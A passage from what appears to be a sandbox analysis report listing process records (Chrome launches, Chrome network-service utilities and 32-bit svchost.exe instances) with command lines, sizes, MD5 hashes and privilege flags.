                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:102
                                                                                                                                                                                            Start time:12:44:22
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1976 --field-trial-handle=1924,i,6482886242108065281,4105261451375631266,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:103
                                                                                                                                                                                            Start time:12:44:26
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:104
                                                                                                                                                                                            Start time:12:44:26
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2012,i,2947015941692405239,17280289242752989468,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:105
                                                                                                                                                                                            Start time:12:44:27
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:106
                                                                                                                                                                                            Start time:12:44:29
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:107
                                                                                                                                                                                            Start time:12:44:30
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1972,i,17200434405895777880,14925594255065276775,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:108
                                                                                                                                                                                            Start time:12:44:34
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:109
                                                                                                                                                                                            Start time:12:44:34
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:110
                                                                                                                                                                                            Start time:12:44:34
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1600 --field-trial-handle=1980,i,13945759412545287249,4073186008645904870,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:111
                                                                                                                                                                                            Start time:12:44:38
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:112
                                                                                                                                                                                            Start time:12:44:38
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1984,i,120110399101443424,9941541229011483260,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:113
                                                                                                                                                                                            Start time:12:44:42
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:114
                                                                                                                                                                                            Start time:12:44:43
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1988,i,15807299402186397352,10536807858062258795,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:115
                                                                                                                                                                                            Start time:12:44:43
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:116
                                                                                                                                                                                            Start time:12:44:45
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:117
                                                                                                                                                                                            Start time:12:44:46
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1996,i,1442060403194708727,17590615368937411025,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:118
                                                                                                                                                                                            Start time:12:44:50
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:119
                                                                                                                                                                                            Start time:12:44:50
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1992,i,14774167980353239420,17590433410553186815,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:120
                                                                                                                                                                                            Start time:12:44:50
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:121
                                                                                                                                                                                            Start time:12:44:54
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:122
                                                                                                                                                                                            Start time:12:44:54
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1204 --field-trial-handle=1964,i,9634848512687327071,160386830931210519,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:123
                                                                                                                                                                                            Start time:12:44:58
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:124
                                                                                                                                                                                            Start time:12:44:59
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1956 --field-trial-handle=1992,i,15123479563739650555,17542146906633038749,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:125
                                                                                                                                                                                            Start time:12:44:59
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:126
                                                                                                                                                                                            Start time:12:45:02
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:127
                                                                                                                                                                                            Start time:12:45:02
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1596 --field-trial-handle=2032,i,2098739127948043686,10317841462462024608,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:128
                                                                                                                                                                                            Start time:12:45:04
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:129
                                                                                                                                                                                            Start time:12:45:05
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,8929845415192330188,781615668034862370,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:130
                                                                                                                                                                                            Start time:12:45:05
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:131
                                                                                                                                                                                            Start time:12:45:11
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:132
                                                                                                                                                                                            Start time:12:45:12
